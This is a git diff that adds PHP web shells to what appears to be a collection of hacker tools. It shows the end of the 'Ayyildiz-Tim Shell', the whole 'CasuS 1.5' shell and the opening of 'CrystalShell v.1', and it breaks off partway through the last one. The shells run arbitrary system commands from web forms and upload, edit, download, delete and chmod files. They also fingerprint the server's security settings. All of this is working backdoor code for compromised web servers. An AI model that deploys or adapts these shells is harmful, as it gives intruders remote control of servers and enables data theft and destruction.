+      color=#ffffff><FONT color=#ff0000> <FONT color=#ffffff> </font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff><FONT 
+      color=#ff0000></DIV></DIV>
+      <DIV align=center></DIV>
+      <SCRIPT language=JavaScript>
+
+<!--
+function welle()
+{
+if(document.all.welle.filters[0].freq > 10)
+document.all.welle.filters[0].freq = 5;
+document.all.welle.filters[0].freq += 1;
+if(document.all.welle.filters[0].phase > 100)
+document.all.welle.filters[0].phase = 0;
+document.all.welle.filters[0].phase += 10;
+if(document.all.welle.filters[0].strength > 10)
+document.all.welle.filters[0].strength = 1;
+document.all.welle.filters[0].strength += 1;
+window.setTimeout("welle()",100);
+}
+welle();
+file://-->
+</SCRIPT>
+      </FONT></TD></TR></TBODY></TABLE></DIV>
+
+
+<?php
+
+define('PHPSHELL_VERSION', '');
+
+?>
+
+<html>
+<head>
+<title>Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?></title>
+<style type="text/css">
+<!--
+.style1 {color: #FF0000}
+.style2 {
+	font-family: Tahoma;
+	font-size: 9px;
+	font-weight: bold;
+}
+-->
+</style>
+</head>
+<body>
+<div align="center">
+  <table width="918" height="484" border="15">
+    <tr>
+      <td width="880"><h1 align="center" class="style1"><img src="http://www.ayyildiz.org/board/images/shine/misc/logo.jpg" width="880" height="200"></h1>
+        <div align="center"><span class="style1"><?php echo PHPSHELL_VERSION ?></span>          <?php
+
+if (ini_get('register_globals') != '1') {
+  /* We'll register the variables as globals: */
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+  /* A workdir has been asked for */
+  if (!empty($command)) {
+    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+      /* We try and match a cd command. */
+      if ($regs[1][0] == '/') {
+        $new_dir = $regs[1]; // 'cd /something/...'
+      } else {
+        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+      }
+      if (file_exists($new_dir) && is_dir($new_dir)) {
+        $work_dir = $new_dir;
+      }
+      unset($command);
+    }
+  }
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+  /* We change directory to that dir: */
+  chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like '/foo/../bar': */
+$work_dir = exec('pwd');
+
+?>
+        </div>
+        <form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+          <p align="center"><strong>Bulundugunuz Dizin</strong>: <b>
+            <?php
+
+$work_dir_splitted = explode('/', substr($work_dir, 1));
+
+echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('<a href="%s?work_dir=%s">%s</a>/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?>
+          </b></p>
+          <p align="center"><strong>Dizin Degistir</strong> :
+              <select name="work_dir" onChange="this.form.submit()">
+                <?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == '.') {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == '..') {
+      /* We have found the parent dir. We must be carefull if the parent 
+	 directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+	/* work_dir is only 1 charecter - it can only be / There's no
+          parent directory then. */
+      } elseif (strrpos($work_dir, '/') == 0) {
+	/* The last / in work_dir were the first charecter.
+	   This means that we have a top-level directory
+	   eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+	 directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == '/') {
+	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+closedir($dir_handle);
+
+?>
+              </select>
+          </p>
+          <p align="center"><strong>Komut</strong>:
+              <input type="text" name="command" size="60">
+              <input name="submit_btn" type="submit" value="Komut Calistir">
+          </p>
+          <p align="center"><strong>Surekli Bagli Kal</strong>  
+            <input type="checkbox" name="stderr">
+          </p>
+          
+        <div align="center">
+              <textarea name="textarea" cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+  if ($stderr) {
+    $tmpfile = tempnam('/tmp', 'phpshell');
+    $command .= " 1> $tmpfile 2>&1; " .
+    "cat $tmpfile; rm $tmpfile";
+  } else if ($command == 'ls') {
+    /* ls looks much better with ' -F', IMHO. */
+    $command .= ' -F';
+  }
+  system($command);
+}
+?>
+
+          </textarea>
+          </div>
+        </form>
+        <div align="center">
+            <script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+        </script>
+        </div>      <hr align="center">      <p align="center" class="style2">Copyright &copy; 2006&ndash;2007, Powered  byThehacker. v 2.1 - <a href="http|//www.ayyildiz.org" class="style1">www.ayyildiz.org</a> </p>
+        <p align="center" class="style2"> Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.</p>
+        <p align="center"><img src="http://ayyildiz.org/images/whosonline2.gif" width="60" height="45"> </p></td>
+    </tr>
+  </table>
+</div>
+</body>
+</html>
+
+
+
+
+</font></font></font></font></font></font></font></font></font></font></font>
+</font>
+
+
+<!--
+/*
+I Always Love Sha        
+*/
+
+</BODY></HTML>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Casus15.php.php.txt b/xakep-shells/PHP/Casus15.php.php.txt
new file mode 100644
index 0000000..d6f6fde
--- /dev/null
+++ b/xakep-shells/PHP/Casus15.php.php.txt
@@ -0,0 +1,368 @@
+<?php
+$default=$DOCUMENT_ROOT;
+$this_file="./casus15.php";
+
+
+
+if(isset($save)){
+$fname=str_replace(" ","_",$fname);
+$fname=str_replace("%20","_",$fname);
+header("Cache-control: private");
+header("Content-type: application/force-download");
+header("Content-Length: ".filesize($save));
+header("Content-Disposition: attachment; filename=$fname");
+
+$fp = fopen($save, 'r');
+fpassthru($fp);
+fclose($fp);
+unset($save);
+exit;
+}
+
+if ( function_exists('ini_get') ) {
+        $onoff = ini_get('register_globals');
+} else {
+        $onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+        @extract($_POST, EXTR_SKIP);
+        @extract($_GET, EXTR_SKIP);
+}
+
+
+function deltree($deldir) {
+        $mydir=@dir($deldir);
+        while($file=$mydir->read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SYLYNDY:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonlary_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çaly?myyiii</center>";
+        exit;
+}
+
+if ($op=='me'){
+echo "<html>
+      <head>
+            <title>CEHENNEMDEN ÇIKAN ÇILGIN TÜRK</title>
+      </head>
+      <body bgcolor='#000000' text='#0000FF' link='#0000FF' vlink='#0000FF' alink='#00FF00'>
+      <center>Fazla söze gerek yok...</center>
+      <center><br>O yanlyz bir kovboy,<br>
+      <br>O cehennemden çykan çylgyn TÜRK,<br>
+      <br>O bir rap manya?y,<br>
+      <br>O bir php coder,<br>
+      <br>O'nun hackten daha çok sevdi?i tek ?ey iki hack,<br>
+      <br>O...<br>
+      <br>O'nun kim olduunu biliyorsunuz O tabiki...<br>
+      <br></center>";
+
+$sayi='7';
+while($sayi>=1){
+echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'> EFENDISI</font> <font color='#FF0000'>MAFIABOY</font> </font></center>";
+$sayi--;
+}
+$sayi2='1';
+while($sayi2<=7){
+echo "<center><font size='$sayi2' color='#008000'>baddog@hotmail.com</font></center>";
+$sayi2++;
+};
+
+echo "</body>
+      </html>";
+exit;
+}
+
+
+echo "<html>
+      <head>
+             <title>CasuS 1.5 by MafiABoY</title>
+      </head>
+
+       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
+       </body>";
+
+echo "<center><font size='+3' color='#FF0000'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
+      <center><font size='+2' color='#FFFFFF'>A TURKISH </font><font size='+2' color='#FF0000'>HACKER</font><br>
+      <br>";
+echo "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
+echo "<br>";
+echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
+echo "<br>";
+echo "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB SHELL</a></center>";
+echo "<br>
+      <br>
+      <br>";
+echo "<center>---><a href='./$this_file?op=me' target='_blank'>MafiABoY</a><---</center>";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<div align=center>
+      <font size='+1' color='#0000FF'><u>Root Klasör</u>: $DOCUMENT_ROOT</font><br>
+      <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "<input type=text size=60 name=dir value='$dir'>
+<input type=submit value='GIT'><br>
+</form>
+</div>";
+
+if ($op=='wshell'){
+echo "<br><center><font size='+1' color='#FF0000'>WEBSHELL</font></center>";
+if (isset($ok)){
+if (empty($kod)){
+die ("<center><font color='#FF0000'>LEN MANYAK KOMUT YAZMAZSAN NE MOK Y?YNE YARAR</font><center>");
+}
+echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
+      <br>";
+echo "<center><input type=text size=35 name=kod value='$kod'><input type=submit name=ok value='CALISTIR'>
+      <br>
+      <br></center></form>";
+echo "<center><TEXTAREA rows=30 cols=85 readonly>";
+system("$kod");
+echo "</TEXTAREA></center>";
+exit;
+
+} elseif (empty($ok)){
+echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
+      <br>";
+echo "<center><input type=text size=35 name=kod value='Calistirmak istediginiz komutu buraya girin'><input type=submit name=ok value='CALISTIR'>
+      <br>
+      <br></center></form>";
+echo "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
+exit;
+}
+}
+
+if ($op=='up'){
+        $path=dir;
+        echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
+if(isset($dy)) {
+
+if(empty($dosya_gonder)){
+} else {
+copy ( $dosya_gonder, "$dir/$dosya_gonder_name") ? print("$dosya_gonder_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder2)){
+} else {
+copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_name <font color='#0000FF'>kopyaland</font>y<br>") : print("$dosya_gonder2_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder3)){
+} else {
+copy ( $dosya_gonder3, "$dir/$dosya_gonder3_name") ? print("$dosya_gonder3_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder3_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder4)){
+} else {
+copy ( $dosya_gonder4, "$dir/$dosya_gonder4_name") ? print("$dosya_gonder4_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder4_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+} elseif(empty($dy )) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder2'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder3'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder4'></center><br>";
+
+echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
+echo "</form>";
+
+
+echo "</html>";
+}
+}
+
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "Böyle Bir Dosya Vardy Üzerine Yazyldy";
+                } else {
+                        $dos = "Dosya Olu?turuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Olu?turulamyyor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açylamyyor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yazylamyyor");
+                fclose($ydosya2);
+                echo "<center><font color='#0000FF'>$dos</font></center>";
+        } else {
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
+        echo "<center>Dosya Ysmi :<input type='text' name='dismi'></center><br>";
+    echo "<br>";
+    echo "<center>KODLAR</center><br>";
+    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+    echo "</form>";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klasör="$path/$kismi";
+                mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Olu?turulamyyor</font></center>");
+                echo "<center><font color='#0000FF'>Klasör Olu?turuldu</font></center>";
+        }
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
+        echo "<center>Klasör Ysmi :<input type='text' name='kismi'></center><br>";
+        echo "<br>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+        echo "</form>";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "<font color=\"#ff0000\">Dosya Yok</font>";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya Açylamyyor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yazylamyyor!");
+fclose($dosya);
+echo "<center><font color='#0000FF'Dosya Ba?aryyla Düzenlendi</font></center>";
+} else {
+$path=$dir;
+echo "<center>DÜZENLE: $yol</center>";
+$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açylamyyor</font></center>");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
+echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
+echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "</form>";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 YSYMLY DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEY?TYRYLEMEDY!!</font>";
+        echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEY?TYRYLDY</font>";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "<form method=post action=./$this_file?op=efp2>
+      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
+      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
+      <input name='dir' type='hidden' value='$yol'>
+      <input type='submit' value='TAMAM' class='input'></div><br>
+      </form>";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
+echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
+echo "<br></div>\n";
+}else{
+echo "<div align=left><a href='./$this_file?dir=$path/$file'>GYT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<font color='#FFFF00'>$dirperm</font>";
+echo " <br></div>\n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+echo "<center>------------------------------</center>";
+echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
+echo "<center><a href='./$this_file?dir=/'>Linux Kök Dizinine Git</a></center>";
+if(file_exists("B:\\")){
+echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
+} else {}
+if(file_exists("C:\\")){
+echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
+} else {}
+if (file_exists("D:\\")){
+ echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
+} else {}
+if (file_exists("E:\\")){
+ echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
+} else {}
+if (file_exists("F:\\")){
+ echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
+} else {}
+if (file_exists("G:\\")){
+ echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
+} else {}
+if (file_exists("H:\\")){
+ echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>SERVER BYLGYLERY</b></font><br></center>";
+echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
+echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
+echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
+echo "<br>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>Y?LEMLER</b></font><br></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Olu?tur</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Olu?tur</a></font></center>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<br>
+      <center>Tüm haklary sahibi MafiABoY'a aittir</center>";
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Crystal.php.txt b/xakep-shells/PHP/Crystal.php.txt
new file mode 100644
index 0000000..ae925d5
--- /dev/null
+++ b/xakep-shells/PHP/Crystal.php.txt
@@ -0,0 +1,1127 @@
+<?
+
+
+
+
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
+/**********************************************************/
+/*                          CrystalShell v.1
+/*                       --------- ----------
+/*
+/*       Coded by : Super-Crystal and Mohajer22
+/*    ------------------------------------------------
+/*    Arab Security Center Team <---thanks
+/*      mail : sup3r-hackers@hotmail.Com
+/* october73 shell & CrystalShell < coding by super crystal
+/*
+/*********************************************************/
+?>
+<?$dir=realpath("./")."/";
+$dir=str_replace("\\","/",$dir);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
+Crystal shell</title>
+<style type='text/css'> body {	background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
+SCROLLBAR-BASE-COLOR: black;    CURSOR: crosshair;    color:   #1CB081; }    img
+{background-color:   #FFFFFF   !important}  input  {background-color:   #303030
+!important} option {  background-color:   #303030   !important}         textarea
+{background-color: #303030 !important} input {color: #1CB081 !important}  option
+{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
+{background-color: #303030 !important} select {font-weight: normal;       color:
+#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
+background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
+0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
+!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
+!important} 	h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
+!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
+normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
+{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: underline;
+color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
+font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
+font-weight:bold; font-style: italic;}-->
+  </style>
+  <![endif]-->
+<meta http-equiv=Content-Language content=ar>
+<!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+ <style>
+<!--
+body { scrollbar-face-color: #000000; scrollbar-shadow-color: #CC0000; scrollbar-highlight-color: #CC0000; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000; scrollbar-arrow-color: #ffffff }
+-->
+</style>
+<style> 
+<!-- 
+#leftright, #topdown{ 
+position:absolute; 
+left:0; 
+top:0; 
+width:1px; 
+height:1px; 
+layer-background-color:limegreen; 
+background-color:red; 
+z-index:100; 
+font-size:1px; 
+} 
+--> 
+</style>
+
+</head>
+  </head>
+<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
+	<th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
+<p align="center">&nbsp;</p>
+	<p align="center">
+<a bookmark="minipanel">
+	<font face="Webdings" size="7" color="#DCE7EF">ö</font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font>
+	<font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1">&nbsp;<span lang="en-us">2006-2007</span></font></p>
+</p>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+<p align="center">
+	<b>
+	<?
+	$dirfile="$file_to_download";
+if (file_exists("$dirfile"))
+{
+header("location: $dirfile");
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+
+
+}
+
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+// PHPINFO
+if ($_GET['action'] == "phpinfo") {
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b&#7883; c&#7845;m";
+	exit;
+}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo("<br>");
+echo "PHP version: <b>".@phpversion()."</b>";
+echo("<br>");
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+?>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<b>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+
+</p>
+	<p align="center"><font color="#FFFF00">&nbsp;</font></p>
+	<p align="center"></p>
+	</th></tr><tr>
+		<td bgcolor="#000000" style="color: #DCE7EF">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font size="4px">
+<b>
+		<font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial">&nbsp;<?php echo php_uname(); ?>&nbsp;</font></span></font></b><p>
+<font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial">&nbsp;</font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?>&nbsp;</font></font>
+</font>
+</p>
+</font>
+<font size=1 face=Verdana>
+<p><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font>
+</b>
+	</font>
+	</font>
+	<a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none">
+<font size=-2 face=verdana color="#FFFFFF">
+<? passthru("id");?></font><font size=-2 face=verdana color="black"><br>
+	</font>
+</a><span lang="en-us"><font face="Wingdings" size="3" color="#FFFFFF">1</font></span><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF">
+<? echo getcwd();?></div></font></font></a></font></b></a></font><br>
+
+<br>&nbsp;<b><font size="4px"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color="#FF0000" face="Verdana" size="-2">
+&nbsp;</font></a></font><font size="4px"><font size=-2 face=verdana></a><font face="Verdana" size="-2">&nbsp;</font></font></font><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="3" face="verdana">Back</font><font color="#DCE7EF" size="1" face="verdana"> </font>
+
+	</font></a><font face="Wingdings" size="5" color="#C0C0C0">ð</font><span lang="en-us"><font size="5" color="#C0C0C0" face="Webdings">
+</font></span><font face="verdana" color="white"><font face=Verdana><font face=verdana color=white></font></font></font><font face=Verdana color="white"><a href=?action=phpinfo target=\"_blank\" style="color: white; text-decoration: none"><font color="#CC0000" size="3"><a target="\&quot;_blank\&quot;" style="text-decoration: none" title="ãÚáæãÇÊ ÇáÜPhp" href="?action=phpinfo"><font color="#CC0000">phpinfo</font></a></font></a></font></b><span lang="en-us"><font color="#C0C0C0" face="Wingdings" size="5">2</font></span><b><font size=-2 face=verdana>
+</font>
+</b><b><font size="4px"><font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
